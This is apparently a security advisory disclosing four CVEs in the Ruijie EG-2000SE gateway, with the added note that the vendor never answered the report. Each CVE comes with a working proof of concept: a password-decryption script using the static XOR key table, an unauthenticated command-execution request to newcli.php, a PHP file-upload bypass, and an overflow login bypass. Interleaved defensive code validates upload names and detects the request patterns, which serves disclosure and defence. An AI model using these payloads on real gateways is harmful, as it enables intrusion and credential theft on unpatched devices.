We found multiple vulnerabilities in the Ruijie EG-2000SE Next Gen Gateway.

CVE-2019-16638: User password is stored with symmetric encryption

CWE-257: Storing Passwords in a Recoverable Format

An issue was found on the Ruijie EG-2000 series gateway. Stored passwords in /data/config.text are only obfuscated with a XOR against a static key table, so anyone who can read the file can easily recover them in cleartext. This was tested on EG-2000SE EG_RGOS 11.1(1)B1.

PoC:

import binascii

# Static key table the gateway XORs every stored password against
KEYTBL = b"*@##Wxf^cOurGer*mArKLe%aIRwolf&^StarRdH#&)####^*$%!!#&)%071177"
# An encoded password as it appears in /data/config.text
pwd_enc = "1044407451471c"
# Everything after the first two digits is the XORed password, hex-encoded
pwd = binascii.unhexlify(pwd_enc[2:])
# The first two digits are the decimal offset into the key table
offset = int(pwd_enc[:2])
result = bytearray()
for i in range(len(pwd)):
    result.append(pwd[i] ^ KEYTBL[i + offset])
print(result.decode())

CVE-2019-16639: Arbitrary command execution on newcli.php

CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

An issue was found on the Ruijie EG-2000 series gateway. There is a newcli.php API interface without access control, which can allow an attacker (who only has web interface access) to use TELNET commands and/or show admin passwords via the mode_url=exec&command= substring.
This affects EG-2000SE EG_RGOS 11.9 B11P1.

PoC:

POST /newcli.php HTTP/1.1
Cookie: [REDACTED]
Content-Type: application/x-www-form-urlencoded

mode_url=exec&command=show%20webmaster%20users

CVE-2019-16640: PHP file upload via upload.php

CWE-434: Unrestricted Upload of File with Dangerous Type

An issue was found in upload.php on the Ruijie EG-2000 series gateway. A parameter passed to the class UploadFile is mishandled (%00 and /var/./html are not checked), which can allow an attacker to upload any file to the gateway.
This affects EG-2000SE EG_RGOS 11.9 B11P1.

PoC:

POST /upload.php?c=upload&a=index&fileext=txt&filedir=%2Fvar%2Fhtml&obj=1&_ruijie_upload%5B%5D=1 HTTP/1.1
Cookie: [REDACTED]
Content-Type: multipart/form-data; boundary=---------------------------9051914041544843365972754266
Content-Length: 554

-----------------------------9051914041544843365972754266
Content-Disposition: form-data; name="file"; filename="/var/./html/poc.php"

<?php phpinfo();
-----------------------------9051914041544843365972754266--
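A hardened counterpart to the UploadFile handling described above, added here as an example and not the gateway's own code: it rejects null bytes and path separators before any filesystem call, matches the extension against a server-side allowlist and against every dotted segment of the name (so poc.php.txt is refused as well), and confirms the final path stays under a directory the server, not the client, chooses. UPLOAD_ROOT, ALLOWED_EXT and DENIED_EXT are assumed values.

```python
import posixpath

# Assumed values: a fixed server-side destination and the file types allowed.
# The client-supplied filedir parameter from the request is deliberately ignored.
UPLOAD_ROOT = "/var/html/uploads"
ALLOWED_EXT = {"txt", "log", "cfg"}
# Extensions that must not appear anywhere in the name, not only at the end
DENIED_EXT = {"php", "php3", "php5", "phtml", "phar"}


def validate_upload_name(filename: str, fileext: str, root: str = UPLOAD_ROOT) -> str:
    """Return the absolute destination path for an upload, or raise ValueError.

    The client may choose only a bare file name; the directory is fixed
    server-side, which removes the /var/./html class of problem entirely.
    """
    if "\x00" in filename:
        raise ValueError("null byte in filename")
    if "/" in filename or "\\" in filename:
        raise ValueError("path separators not allowed in filename")
    if filename in ("", ".", ".."):
        raise ValueError("empty or relative filename")
    segments = filename.lower().split(".")
    if len(segments) < 2 or segments[0] == "":
        raise ValueError("filename needs a stem and an extension")
    if segments[-1] != fileext.lower():
        raise ValueError("extension does not match declared fileext")
    if segments[-1] not in ALLOWED_EXT:
        raise ValueError(f"extension {segments[-1]!r} not allowed")
    if any(seg in DENIED_EXT for seg in segments[1:]):
        raise ValueError("executable extension embedded in filename")
    # Belt and braces: normalise and confirm the result sits directly in root
    root = posixpath.normpath(root)
    dest = posixpath.normpath(posixpath.join(root, filename))
    if posixpath.dirname(dest) != root:
        raise ValueError("destination escapes upload root")
    return dest


def upload_name_is_safe(filename: str, fileext: str) -> bool:
    """Boolean convenience wrapper around validate_upload_name."""
    try:
        validate_upload_name(filename, fileext)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    for name in ("report.txt", "/var/./html/poc.php", "poc.txt\x00.php", "poc.php.txt"):
        print(repr(name), upload_name_is_safe(name, "txt"))
```

The order of checks matters: the null byte and separator tests run on the raw string before any lowercasing, splitting or path joining, because those are exactly the operations a truncating C-level API or a normalising path routine would otherwise be fooled by.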

CVE-2019-16641: Buffer overflow on login.php

CWE-121: Stack-based Buffer Overflow

An issue was found on the Ruijie EG-2000 series gateway. There is a buffer overflow in client.so. Consequently, an attacker can use login.php to log in to any account without providing its password.
This affects EG-2000SE EG_RGOS 11.1(1)B1.

PoC:

POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 124

username=admin&password=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
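Until a vendor patch is available, the two request patterns above (the newcli.php PoC for CVE-2019-16639 and the login.php PoC for CVE-2019-16641) are easy to spot at a reverse proxy or in full-request logs. The following Python is an added example and not part of the advisory: it flags an exec-mode call to newcli.php and an oversized password parameter sent to login.php. The sample requests are constructed to mirror the PoCs, and MAX_PASSWORD_LEN is an assumed threshold.

```python
from urllib.parse import parse_qs, urlsplit

# Assumed upper bound on a legitimate password field; real admin passwords
# are far shorter than the 100-byte PoC payload.
MAX_PASSWORD_LEN = 64

# Constructed sample requests mirroring the advisory's PoCs: (target, body)
SAMPLE_REQUESTS = [
    ("/newcli.php", "mode_url=exec&command=show%20webmaster%20users"),
    ("/login.php", "username=admin&password=" + "A" * 100),
    ("/login.php", "username=admin&password=s3cret"),
    ("/newcli.php?mode_url=help", ""),
    ("/index.php", ""),
]


def inspect_request(target: str, body: str) -> list:
    """Return human-readable findings for one request (empty if nothing matched)."""
    findings = []
    url = urlsplit(target)
    path = url.path.lower()
    # Parameters may arrive in the query string or the form body; merge both
    params = parse_qs(url.query, keep_blank_values=True)
    for key, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(key, []).extend(values)

    # Rule 1: any exec-mode call to the unauthenticated CLI bridge
    if path.endswith("/newcli.php") and "exec" in params.get("mode_url", []):
        cmd = params.get("command", [""])[0]
        findings.append(f"newcli.php exec mode, command={cmd!r} (CVE-2019-16639)")

    # Rule 2: a password field far longer than any legitimate credential
    if path.endswith("/login.php"):
        for pw in params.get("password", []):
            if len(pw) > MAX_PASSWORD_LEN:
                findings.append(
                    f"login.php password of {len(pw)} bytes exceeds "
                    f"{MAX_PASSWORD_LEN} (CVE-2019-16641)"
                )
    return findings


def scan(requests=SAMPLE_REQUESTS) -> list:
    """Return (index, findings) for every request that triggered at least one rule."""
    hits = []
    for i, (target, body) in enumerate(requests):
        found = inspect_request(target, body)
        if found:
            hits.append((i, found))
    return hits


if __name__ == "__main__":
    for i, found in scan():
        print(i, SAMPLE_REQUESTS[i][0], *found, sep="  ")
```

Both rules key on the decoded parameter values rather than on the raw body, so percent-encoding of the command or of the password does not change the verdict; the length rule also catches the overflow attempt regardless of which byte the payload is padded with.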

For all of the vulnerabilities I found, I submitted a bug report to Ruijie on 10/14/2019, but I didn't get any response from them. The official patch for these vulnerabilities is not available.
